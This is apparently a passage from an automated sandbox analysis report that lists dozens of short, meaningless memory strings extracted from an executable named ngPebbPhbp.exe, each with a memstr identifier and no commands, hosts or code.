                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4"4(4,424<4f4p4[4c4g4m4q4w4memstr_21a07d00-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5*52565<5@5f5p5z5d5o5w5{5memstr_880b2fca-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6)636>6f6j6p6t6z6d6n6x6memstr_8809bdf3-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7#7)737=7g7r7z7^7d7h7n7x7memstr_a188020f-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8!8)8-83878=8g8q8[8f8n8r8x8|8memstr_42ed59dc-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9 9*959=9a9g9k9q9[9e9o9z9memstr_bfcfbe31-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: : :*:4:>:i:q:u:[:_:e:o:y:memstr_7b0e05a7-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ; ;$;*;.;4;>;h;r;];e;i;o;s;y;memstr_2095d276-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <!<,<4<8<><b<h<r<\<f<q<y<}<memstr_10a10edb-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =!=+=5=@=h=l=r=v=\=f=p=z=memstr_6a00a33a-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >!>%>+>5>?>i>t>\>`>e>k>o>rmemstr_322eb374-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >!>%>+>5>?>i>t>\>`>e>k>o>rrrrrrrrmemstr_a0ee5b87-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrmemstr_9eb080af-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrmemstr_d0572c58-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_7cf7cdf0-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrmemstr_fec4be86-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrmemstr_56aaf974-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrmemstr_3679339b-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrmemstr_16bc23ee-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_cbe5bf69-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_353e8cea-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_0f47e708-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrmemstr_5bb4449d-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_f86704a9-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_756a5388-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_0f577941-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_ac3a1039-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrmemstr_dd3d09a9-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_c219027a-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrmemstr_91f0622e-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_4e24eba4-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_566f0b6f-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mmmmmmmmmemstr_8e39a260-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mmmmmmmmemstr_c66657ce-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr/memstr_95d11691-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrmemstr_5a937bc8-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrmemstr_b1409f49-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !!!!!memstr_aaa7efc2-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zzrrzzmemstr_2e3dd5d4-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qqqrrzmemstr_eeb21013-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_439792ec-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rjjjjjjjjjjjjjrrrmemstr_83006967-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rrrrrrrrrrrrrrrrrrmmmmmmmmmmmmm|memstr_68047a39-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mmmmmmmmmmmmrrrrrrrrrrrrrrrmemstr_acb8f20c-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4g5f8l879w9a9memstr_35748e49-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <$<k<memstr_23c9e7c1-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =!=,=7=b=m=x=c=n=y=memstr_0afda70d-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =>">memstr_47e60004-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?*?5?g?r?d?o?z?memstr_74a1d53b-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5m8h8memstr_38f0b0cb-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 112b2f2j2n2r2v2z2^2b2memstr_c1edc7a3-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3#4s4memstr_4478930f-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5#5'5+5/53575;5?5c5g5k5o5s5w5[5_5c5g5k5o5s5w5{5memstr_22c80ed0-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6m6z6r7]7v7memstr_510bbce4-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?&?*?.?2?6?:?>?b?f?j?n?r?v?z?^?b?f?j?n?r?v?z?~?memstr_71285b46-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1-1x1memstr_aab16806-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6"6'6,61666<6e6memstr_6c12c1eb-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 727x7memstr_43582f6e-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7+8_8memstr_628f5a21-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9g9u9|9memstr_2723aadd-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;v;[;`;e;j;o;u;z;memstr_0cf1cd0f-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =f=u=memstr_90d866dc-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1 2l2memstr_e742a6f9-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3"373>3d3v3`3memstr_1ea9f4b9-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5,585g5l5m5s5x5memstr_7e37bedc-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6%60686b6j6u6[6a6k6u6memstr_ae6b5c79-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8e8z8!999?9t9l9r9memstr_e08ba444-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :#:-:;:v:a:memstr_bb257531-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;b;v;];memstr_49b90b0b-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =&=f=l=memstr_88d31255-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >a>p>y>f>|>memstr_49b74055-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >"?+?1?9?>?q?e?j?}?memstr_118e0133-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 0'0.050<0c0k0s0[0g0p0u0{0memstr_a712d198-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1r1~1memstr_c395fc61-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4 4v4memstr_fa28e3fe-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: h6l6p6t6x6\6`6d6h6l6p6t6x6|6memstr_bb9f3f13-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: th6l6p6t6x6\6`6d6h6l6p6t6x6|6memstr_0854ec8a-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: = =v=memstr_06046888-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4d6k6memstr_ef0f2f1b-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7"7(7c7k7memstr_0fb0ce08-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 818?8f8l8q8memstr_85778287-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9+939i9memstr_356c1cb0-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :0:::f:k:p:n:x:memstr_5b2538ed-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;e;q;n<u<memstr_76d964a6-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <f=u=6>memstr_683de859-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <f=u=6>@memstr_aba5eacc-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 708<:e:memstr_9b2f1534-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :&;c;o;memstr_c2091d3f-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;7<s=\=d=memstr_fa240811-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =3?f?b?memstr_b4862bd2-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 010memstr_91b128be-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1)121c1u1p1memstr_b4159cdc-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 122d2`2memstr_e4f6a76b-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 343`3memstr_1efa6e40-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 343`3`memstr_9d6b6d3c-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3!4%4)4-4145494=4memstr_b66a47d6-2
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4a5e5i5m5q5u5y5]5memstr_f9082ea5-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3#3'3+3/33373;3?3c3memstr_7d85812c-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 37:q:memstr_00f4df62-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :z;w;memstr_d99537f2-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4#414=4i4w4g4|4memstr_60687471-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5+5?5memstr_a32efb8e-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6c7l7w8memstr_a283d844-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9&:+:0:k:p:u:memstr_649419c0-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1'2.2f5memstr_508b2919-6
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6,737memstr_01fff86a-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4$4y4memstr_6f3d3471-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5'636?6memstr_aa3abdd8-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :;o;memstr_0b3e2846-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.<z<memstr_c39bd7b4-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t0s0x0,1memstr_a083590e-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0t0s0x0,1memstr_02c16202-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5j6w6memstr_057143db-1
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :t<=>?memstr_54f81b9a-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5-6`6s6memstr_dbb957cb-d
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 888c8p8b8memstr_67217377-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%9g9]9o9memstr_f17552a0-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e:w:memstr_150f8443-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <"<b<memstr_9fdcd568-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =)=;=r=memstr_3553f69d-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >$>j>u>g>memstr_e5cc7be5-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >)?7?i?t?z?memstr_153ee7cd-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 020r0}0memstr_c597468a-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x 020r0}0memstr_f793fe31-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1c1}1memstr_fc176b54-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9a:s:memstr_b4ebc3de-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >;?j?memstr_61ebf0bb-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5o5s9memstr_74748a87-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;r;{;memstr_70d5d922-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ='>,>m>{>memstr_5eafd161-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 171d1memstr_78cae9f4-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2d3o3memstr_14c4bfb7-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4+5o5memstr_b9318f87-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 516@6e6v6\6g6o6z6memstr_1a088b01-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7 7(7@7e7l7u7memstr_4ca57b0a-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8.8u8`8j8p8memstr_9987e329-5
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;8;u;`;memstr_88ec0836-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;j<j=p=memstr_c2f793ba-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1f1w1r1~1memstr_f4c3f1d8-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2:2k2`2j2memstr_daa7dc4b-b
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3%3@3g3n3s3x3u3}3memstr_4916f4e8-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4(474c4q4s4memstr_755ba5ef-4
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5)535o5z5_5d5memstr_3fd5f376-e
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6.686t6_6d6i6memstr_41d5f798-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7,777<7a7k7memstr_cd7fc376-c
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8f8j8memstr_b14b01bb-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 949?9d9i9a9w9memstr_96d03243-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :0:b:n:memstr_188f69ff-a
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <"=?>[>memstr_9e70c83f-7
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6.9m9t9memstr_ff251a10-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dc6.9m9t9memstr_4747335c-0
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =)=e=w=}=->f>memstr_2e02eeca-9
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >#?5?k?memstr_2d3ec6ae-3
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j0p0m0memstr_0c8f9b87-f
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0(4b4memstr_e4c49261-8
                Source: ngPebbPhbp.exe, 00000000.00000003.1736175050.000000000358B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5!5[5b5memstr_2672c3eb-d
